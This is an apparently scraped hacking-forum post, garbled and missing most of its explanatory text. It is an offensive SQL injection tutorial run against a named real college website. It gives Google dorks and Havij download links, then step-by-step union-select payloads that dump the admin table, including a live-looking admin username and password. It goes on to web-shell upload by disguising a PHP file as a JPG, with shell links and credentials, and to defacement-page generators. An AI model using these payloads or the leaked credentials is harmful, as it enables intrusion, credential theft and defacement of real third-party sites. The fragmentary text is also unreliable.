http://www.facebook.com/l.php?u=http%3A%2F%2Fsupport.microsoft.com%2Fdefault.aspx%3Fscid%3Dkb%3Ben-us%3B150543%26sd%3Dtech&h=2AQHSwFuI&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&h=xAQE4xu3u&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&h=yAQGz0Q0b&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.zonealarm.com%2F&h=1AQH8W6-s&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.comodo.com%2F&h=ZAQE_IVKC&s=1 -
Havij
SQLi
Download
.Havij 1.5 Pro : http://www.mediafire.com/?s7a89dxmfwxcyij
Google.Com
"inurl:php?id="
Dork http://pastebin.com/DvnHxg7i
2,010,000,000 0.23
, php?id=
http://www.facebook.com/groups/hackingwrld/doc/444276235662287/http://www.mediafire.com/?s7a89dxmfwxcyijhttp://pastebin.com/DvnHxg7i -
http://www.paulprescott.com/theme.php?id=10
ID=XX, XX
ID=10
Error , , inject
http://www.paulprescott.com/theme.php?id=10 -
Error
,
"Current DB: XXXX"
-
MySQL
-
,
-
administration panel
,
-
Username Password
,
-
Username, Password
-
Administration Panel login
-
administration panel
.php?id=XX
-
URL
Administration Panel login page
Administration Panel
-
administration panel login
-
-
SQL INJECT
SQL INJECT
dork use
inurl:index.php?id= inurl:trainers.php?id=
inurl:buy.php?category= inurl:article.php?ID=
inurl:play_old.php?id= inurl:declaration_more.php?decl_id=
inurl:Pageid= inurl:games.php?id=
inurl:page.php?file= inurl:newsDetail.php?id=
inurl:gallery.php?id=
dork sql
8500 SQL dorks list
http://pastebin.com/dzknXjgP or
http://pastebin.com/ayV6tNS2
dork www.google.com SEARCH
inurl:news-and-events.php?id=
dork SEARCH
http://www.eastodissa.ac.in/news-and-events.php?id=22
http://www.facebook.com/l.php?u=http%3A%2F%2Fpastebin.com%2FdzknXjgP&h=qAQHvZabs&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fpastebin.com%2FayV6tNS2&h=pAQEsApFv&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com&h=6AQGmFkpU&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22&h=OAQEfPU5H -
SQL INJECT ID
injectable
url
http://www.eastodissa.ac.in/news-and-events.php?id=22'
injectable
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22&h=WAQF599XI -
injectable inject
http://www.eastodissa.ac.in/news-and-events.php?id=22
, order+by+
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+
1
1
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1--
,
2
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22&h=2AQHSwFuIhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22%2Border%2Bby%2B&h=kAQHyU3qMhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22%2Border%2Bby%2B1&h=aAQGQ6QTn -
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2--
,
3,4,5 7
8 SQL
(
www.site.com/index.php?id=1 order 999 [ no error ]
order by 999 error
id=1
www.site.com/index.php?id=1 +
error
SQL Injection
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8--
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22%2Border%2Bby%2B2&h=eAQFKeJrAhttp://www.site.com/index.php?id=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.site.com%2Findex.php%3Fid%3D1&h=uAQENtlS2&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D22%2Border%2Bby%2B8&h=_AQFMNOud -
7
7
+union+select+1,2,3,4,5,6,7--
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7--
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2C2%2C3%2C4%2C5%2C6%2C7&h=rAQFr8yVA -
( , news-and-events.php?id=
2,3,
2
2 @@version
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7--
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2C%40%40version%2C3%2C4%2C5%2C6%2C7&h=xAQE4xu3u -
5.1.68-community
5 inject
group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schem
a=database()--
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.tables%2Bwhere%2Btable_schema%3Ddatabase%28%29&h=VAQH2_vvfhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.tables%2Bwhere%2Btable_schema%3Ddatabase%28%29&h=VAQH2_vvfhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.tables%2Bwhere%2Btable_schema%3Ddatabase%28%29&h=VAQH2_vvf -
est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplicatio
n,est_placementrecord
est_achievement , est_companyrecord
est_admin
group_concat(column_name)
from information_schema.columns where table_name=
CHAR
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
F9
http://www.facebook.com/l.php?u=https%3A%2F%2Faddons.mozilla.org%2Fen-US%2Ffirefox%2Faddon%2Fhackbar%2F&h=JAQHDN-eJ&s=1 -
SQL>MySQL>MySQL CHAR()
ok
est_admin CHAR CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)
http://www.eastodissa.ac.in/news-and-events.php?id=-
22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=CH
AR(101, 115, 116, 95, 97, 100, 109, 105, 110)--
est_admin CHAR
uid,userid,password,emailid,signature,last_login
group_concat(login,0x3a,Pass,0x3a),
userId login userId
Pass password
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28column_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.columns%2Bwhere%2Btable_name%3DCHAR&h=fAQEx51ZHhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28column_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.columns%2Bwhere%2Btable_name%3DCHAR&h=fAQEx51ZHhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28column_name%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Binformation_schema.columns%2Bwhere%2Btable_name%3DCHAR&h=fAQEx51ZH -
from+est_admin--
+from+ est_admin est_admin
http://www.eastodissa.ac.in/news-and-events.php?id=-
22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--
trustadmin:isti$$9!5!2013:
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28userId%2C0x3a%2Cpassword%2C0x3a%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Best_admin&h=IAQFwyDZHhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.eastodissa.ac.in%2Fnews-and-events.php%3Fid%3D-22%2Bunion%2Bselect%2B1%2Cgroup_concat%28userId%2C0x3a%2Cpassword%2C0x3a%29%2C3%2C4%2C5%2C6%2C7%2Bfrom%2Best_admin&h=IAQFwyDZH -
trustadmin
: isti$$9!5!2013
-http://scan.subhashdasyam.com/admin-panel-finder.php
havij
MD5 www.md5decrypter.cu.uk/
http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player
http://www.facebook.com/l.php?u=http%3A%2F%2Fscan.subhashdasyam.com%2Fadmin-panel-finder.php&h=zAQHfxRDK&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.md5decrypter.cu.uk%2F&h=jAQFBTwjT&s=1http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player -
shell LiveHTTPHeaders
Mozilla Firox
Live HTTP Headers
https://addons.mozilla.org/en/firefox/addon/live -http -headers/
shell
i -47 shell
http://www.pastebucket.com/19852
or
www.mediafire.com/?64fjdlvzo9zhrra
shell username and password
username: I -47
password: I -47
https://addons.mozilla.org/en/firefox/addon/live-http-headers/http://www.pastebucket.com/19852http://www.mediafire.com/?64fjdlvzo9zhrra -
47.php.jpg (
jpg
47.php.jpg
Live HTTP Headers addon
Live HTTP Headers
-
save click
47 .php.jpg
Reply
-
shell.php.jpg shell.php
Reply
-
www.site.com/gallery 37473.jpg
jpg 47.php www.site.com/gallery/ 47.php
http://www.site.com/gallery/37473.jpg -
Video Tutorial :
http://www.youtube.com/watch?v=xSl13HrQHZg&feature=youtu.be
http://www.youtube.com/watch?v=xSl13HrQHZg&feature=youtu.be -
--==::DefacePage Generator::==--
Download - http://www.mediafire.com/download/br6hdik65zhon6o/Advance+Deface+Page+Creator.rar
3xtr3m3 H4ck3r
- http://i1114.photobucket.com/albums/k528/rakibulhasan09/Hacker1.gif
http://www.mediafire.com/download/br6hdik65zhon6o/Advance+Deface+Page+Creator.rarhttp://4.bp.blogspot.com/-PBBb4m33mqY/T0CTl45DuhI/AAAAAAAAAMk/j9e4_FbS6Uk/s1600/DPG1.pnghttp://i1114.photobucket.com/albums/k528/rakibulhasan09/Hacker1.gif -
- Generate
- Copy
File>Save
as .txt .html All files
Simple Demo - http://pastehtml.com/view/bonelu59o.html
--==::Advance Deface Page Creator::==--
Download - http://www.mediafire.com/download/br6hdik65zhon6o/Advance+Deface+Page+Creator.rar
Tutorial -
- X3N4X
http://pastehtml.com/view/bonelu59o.htmlhttp://www.mediafire.com/download/br6hdik65zhon6o/Advance+Deface+Page+Creator.rarhttp://4.bp.blogspot.com/-rf1WUadtajI/T0CqrKoIyAI/AAAAAAAAAMs/nT0KNEKd8qo/s1600/ADC1.png -
Enable All
http://3.bp.blogspot.com/-Z_0DnnmmnSE/T0CqtdbyIjI/AAAAAAAAAM0/Af3bvGkQwlI/s1600/ADC2.pnghttp://3.bp.blogspot.com/-9prXYzrGPbM/T0CqvUqk70I/AAAAAAAAAM8/RzmvuJ9o26U/s1600/ADC3.png -
Add Homepage title and texts
http://2.bp.blogspot.com/-BMzSBpffmKA/T0Cqxh05x2I/AAAAAAAAANE/4Qy6cv7IX_o/s1600/ADC4.pnghttp://4.bp.blogspot.com/-8Gc-h8GAGYE/T0Cqy2PIi7I/AAAAAAAAANM/Ji3RKAG7QdE/s1600/ADC5.png -
Add
http://3.bp.blogspot.com/-b86MPc18dbY/T0Cq0IyhtoI/AAAAAAAAANU/ZW0IQcjKXj0/s1600/ADC6.pnghttp://2.bp.blogspot.com/-5Mai7VO7-28/T0Cq1RtAFvI/AAAAAAAAANc/LchUPV2Ixns/s1600/ADC7.png -
Create Defacement
HTML
Simple Demo - http://pastehtml.com/view/bonexk664.html
--==:: HTML ::==--
http://3.bp.blogspot.com/-DGNM8k6vpaM/T0Cq3bDIXRI/AAAAAAAAANk/88nJBJF9kbg/s1600/ADC8.png
